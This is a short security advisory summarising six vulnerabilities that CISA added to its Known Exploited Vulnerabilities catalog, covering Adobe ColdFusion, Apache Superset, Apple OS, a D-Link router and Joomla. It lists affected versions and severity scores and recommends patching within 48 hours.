CISA Updates Known Exploited Vulnerabilities Catalog - 20240109002¶
Overview¶
CISA has added six items to their Known Exploited Vulnerabilities catalog.
What is vulnerable?¶
| CISA Article | Product(s) Affected | Summary | Severity | CVSS |
|---|---|---|---|---|
| CVE-2023-38203 | Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) | A Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. | Critical | 9.8 |
| CVE-2023-29300 | Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) | A Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. | Critical | 9.8 |
| CVE-2023-27524 | Apache Superset versions up to and including 2.0.1 | Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config. | Critical | 9.8 |
| CVE-2023-41990 | AppleOS versions before tvOS 16.2, iOS 16.2 and iPadOS 16.2, macOS Monterey 12.6.7, macOS Big Sur 11.7.8, iOS 15.7.7 and iPadOS 15.7.7, macOS Ventura 13.1, watchOS 9.2 | Processing a font file may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1. | High | 7.8 |
| CVE-2016-20017 | D-Link DSL-2750B devices before 1.05 | Allows remote unauthenticated command injection via the login.cgi cli parameter, as exploited in the wild in 2016 through 2022. | Critical | 9.8 |
| CVE-2023-23752 | Joomla! 4.0.0 through 4.2.7. | An improper access check allows unauthorized access to webservice endpoints. | Medium | 5.3 |
Recommendation¶
The WA SOC recommends administrators apply the solutions as per vendor instructions to all affected devices within expected timeframe of 48 Hours... (refer Patch Management):